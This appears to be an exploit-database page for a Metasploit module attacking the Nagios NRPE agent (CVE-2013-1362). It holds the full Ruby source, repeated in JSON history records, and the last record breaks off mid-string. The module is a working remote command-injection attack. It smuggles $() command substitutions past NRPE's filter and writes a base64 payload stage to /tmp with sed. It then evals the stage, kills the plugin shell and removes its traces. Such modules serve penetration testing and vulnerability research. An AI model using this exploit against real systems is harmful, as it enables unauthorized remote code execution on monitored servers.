ID MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option, dont_blame_nrpe, which enables command-line arguments to be provided to remote plugins. When this option is enabled, even though NRPE makes an effort to sanitize arguments to prevent command execution, it is still possible to execute arbitrary commands (the metacharacter filter does not cover the $() command-substitution syntax, so a crafted argument is evaluated by the shell that launches the plugin).
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
require 'zlib'
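class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Size of the fixed query/response buffer in an NRPE v2 packet. The pack
  # templates below use it as a fixed-width field, so a longer message would be
  # cut off on the wire without any error being raised.
  NRPE_PACKET_BUFFER = 1024

  # v2 packet layout: version (n), type (n), crc32 (N), result code (n),
  # buffer (fixed width), padding (n). "a" keeps NUL padding when sending,
  # "A" strips trailing NULs/spaces when reading the reply.
  QUERY_TEMPLATE    = "nnNna#{NRPE_PACKET_BUFFER}n".freeze
  RESPONSE_TEMPLATE = "nnNnA#{NRPE_PACKET_BUFFER}n".freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
      'Description'    => %q{
        The Nagios Remote Plugin Executor (NRPE) is installed to allow a central
        Nagios server to actively poll information from the hosts it monitors. NRPE
        has a configuration option dont_blame_nrpe which enables command-line arguments
        to be provided remote plugins. When this option is enabled, even when NRPE makes
        an effort to sanitize arguments to prevent command execution, it is possible to
        execute arbitrary commands.
      },
      'Author'         =>
        [
          'Rudolph Pereir',                 # Vulnerability discovery
          'jwpari <jwpari[at]beersec.org>'  # Independently discovered and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1362' ],
          [ 'OSVDB', '90582'],
          [ 'BID', '58142'],
          [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'perl python ruby telnet',
              # *_perl, *_python and *_ruby work if they are installed
            }
        },
      'Targets'        =>
        [
          [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 21 2013'
    ))

    register_options(
      [
        Opt::RPORT(5666),
        OptEnum.new('NRPECMD', [
          true,
          "NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg",
          'check_procs',
          ['check_procs', 'check_users', 'check_load', 'check_disk']
        ]),
        # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below
        OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true])
      ])
  end

  # Send one NRPE v2 query packet carrying +message+ and return the text of
  # the daemon's reply buffer.
  #
  # @param message [String] the "command!arguments" string for the query buffer
  # @return [String, nil] the reply buffer; "" when the daemon closed the
  #   connection without answering, nil when nothing at all was read
  # @raise [ArgumentError] if +message+ does not fit the fixed packet buffer
  def send_message(message)
    # The buffer is a fixed-width field; the pack template would silently drop
    # anything beyond it. Reserve the final byte, presumably used by the daemon
    # as a C string terminator, rather than send a truncated query.
    if message.bytesize >= NRPE_PACKET_BUFFER
      raise ArgumentError, "NRPE query must be shorter than #{NRPE_PACKET_BUFFER} bytes, got #{message.bytesize}"
    end

    fields = [
      2,        # packet version
      1,        # packet type: 1 = query
      0,        # crc32 placeholder, filled in below
      0,        # result code, ignored for query packets
      message,  # command and arguments
      0         # padding
    ]
    # The checksum is computed over the whole packet with the crc field zeroed.
    fields[2] = Zlib::crc32(fields.pack(QUERY_TEMPLATE))

    begin
      sock.put(fields.pack(QUERY_TEMPLATE))
      reply = sock.get_once
    rescue ::EOFError
      # NRPE drops the connection without replying when it rejects a request;
      # callers see "" as "no answer" rather than as a transport failure.
      reply = ""
    end

    return nil if reply.nil?
    reply.unpack(RESPONSE_TEMPLATE)[4]
  end

  # Reset per-run connection state before the framework's own setup.
  def setup
    @ssl_socket = nil   # OpenSSL::SSL::SSLSocket layered over sock when ADH is in use
    @force_ssl  = false # set by check() when a plaintext probe is reset by the peer
    super
  end

  # Deliver the payload through NRPE's argument handling.
  #
  # The daemon filters |`&><'"\[]{}; from arguments but not $(), so the whole
  # stage is expressed as nested command substitutions. Because ">" is
  # filtered, the base64 stage is written to a file via GNU sed -i instead of
  # a redirection, decoded with coreutils base64 and eval'd.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the target is not
  #   vulnerable or the built command cannot fit in an NRPE packet
  def exploit
    if check != Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections")
    end

    # setsid/nohup detach the payload from the plugin's shell, which is killed below.
    stage = Rex::Text.encode_base64("setsid nohup #{payload.encoded} & ")

    # NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :)
    # datastore[] hands back the stored String object; appending to it in
    # place would corrupt the NRPECMD option for every later run, so work on
    # a copy.
    command = datastore['NRPECMD'].dup
    command << "!"
    command << "$($(rm -f /tmp/$$)"             # Delete the file if it exists
    # Need a way to write a file without redirection (">" is filtered) and
    # perl cannot be assumed on every Linux host, so GNU sed -i does the writing.
    # TODO: some hosts may not have a writable /tmp.
    command << "$(cp -f /etc/passwd /tmp/$$)"   # populate the file with at least one line of text
    command << "$(sed 1i#{stage} -i /tmp/$$)"   # prepend the stage to the file
    command << "$(sed q -i /tmp/$$)"            # delete every line after the stage
    command << "$(eval $(base64 -d /tmp/$$) )"  # decode and execute the stage (base64 is in coreutils)
    command << "$(kill -9 $$)"                  # kill the plugin's popen'd sh so the real check never runs
    command << "$(rm -f /tmp/$$))"              # remove the staging file

    # A query longer than the packet buffer would be truncated on the wire,
    # leaving the substitution unbalanced; fail loudly instead of sending it.
    if command.bytesize >= NRPE_PACKET_BUFFER
      fail_with(Failure::BadConfig, "Built command is #{command.bytesize} bytes but the NRPE query buffer holds fewer than #{NRPE_PACKET_BUFFER}; use a shorter payload")
    end

    connect
    begin
      print_status("Sending request...")
      send_message(command)
    ensure
      # send_message may raise mid-exchange; never leave the socket open.
      disconnect
    end
  end

  # Probe whether the daemon accepts arguments and lets $() through.
  #
  # A query for an undefined command with "$()" as its argument is answered
  # with "NRPE: Command '__fake_check' not defined" only when arguments are
  # enabled and the metacharacter filter does not know $() (pre-2.14).
  # A daemon that rejects the request closes the connection instead.
  # If the plaintext probe is reset by the peer, the probe is retried once
  # over ADH SSL. Any other reply, including a patched daemon that swallows
  # the request, yields Unknown.
  #
  # @return [Exploit::CheckCode]
  def check
    vprint_status("Checking if remote NRPE supports command line arguments")

    begin
      connect
      res = send_message("__fake_check!$()")
      # Arguments enabled and $() not in NASTY_METACHARS: the daemon complains
      # about the command name, which means the argument passed the filter.
      if res && res =~ /not defined/
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::EOFError
      # The daemon closes the connection when arguments are disabled.
      return Exploit::CheckCode::Safe
    rescue ::Errno::ECONNRESET
      unless datastore['NRPESSL'] || @force_ssl
        vprint_status("Retrying with ADH SSL")
        # ensure does not run on retry, so release the plaintext socket here,
        # and do it before flipping @force_ssl so disconnect sees the state
        # that socket was opened under.
        disconnect
        @force_ssl = true
        retry
      end
      return Exploit::CheckCode::Safe
    rescue ::StandardError
      return Exploit::CheckCode::Unknown
    ensure
      # The probe socket was previously left open for exploit() to orphan
      # with a second connect; close it on every exit path instead.
      disconnect
    end

    # TODO: patched version (>= 2.14, $() filtered) appears to land here
    Exploit::CheckCode::Unknown
  end

  # Open the TCP connection and, when NRPESSL or @force_ssl is set, layer an
  # anonymous-DH TLS session on top of it.
  #
  # NRPE's stock transport is unauthenticated Anonymous Diffie-Hellman: there
  # is no certificate, so VERIFY_NONE is the only workable mode and the session
  # offers no server identity, only confidentiality against passive observers.
  # The framework's global SSL option cannot be used here because it would
  # stack an SSLSocket on top of another SSLSocket whose handshake has not
  # completed; hence this replacement connect.
  #
  # @param global [Boolean] passed through to Msf::Exploit::Remote::Tcp#connect
  # @param opts [Hash] passed through to Msf::Exploit::Remote::Tcp#connect
  # @return [Rex::Socket::Tcp] the connected socket, also stored in +sock+
  def connect(global = true, opts = {})
    self.sock = super(global, opts)

    if datastore['NRPESSL'] || @force_ssl
      ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)
      ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE  # ADH presents no certificate to verify
      ctx.ciphers = "ADH"

      @ssl_socket = OpenSSL::SSL::SSLSocket.new(sock, ctx)
      @ssl_socket.connect

      # Teach the Rex socket to route reads/writes through the TLS session.
      sock.extend(Rex::Socket::SslTcp)
      sock.sslsock = @ssl_socket
      sock.sslctx  = ctx
    end

    sock
  end

  # Tear down the TLS layer (if one was established) and then the TCP socket.
  #
  # Keyed on @ssl_socket rather than on the option flags so that calling this
  # after a failed or never-attempted connect is harmless.
  def disconnect
    if @ssl_socket
      begin
        @ssl_socket.sysclose
      rescue ::IOError, ::SystemCallError
        # already closed or reset by the peer; nothing left to release
      end
      @ssl_socket = nil
    end
    super
  end
end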
{"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-11-28T18:22:45", "history": [{"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/nagios_nrpe_arguments", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2013-1362", "http://www.securityfocus.com/bid/58142", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-07-02T23:44:48", "history": [], "viewCount": 8, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\n\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-07-02T23:44:48", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/nagios_nrpe_arguments", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2013-1362", "http://www.securityfocus.com/bid/58142", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-07-24T19:45:55", "history": [], "viewCount": 10, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-07-24T19:45:55", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-08-21T15:30:09", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
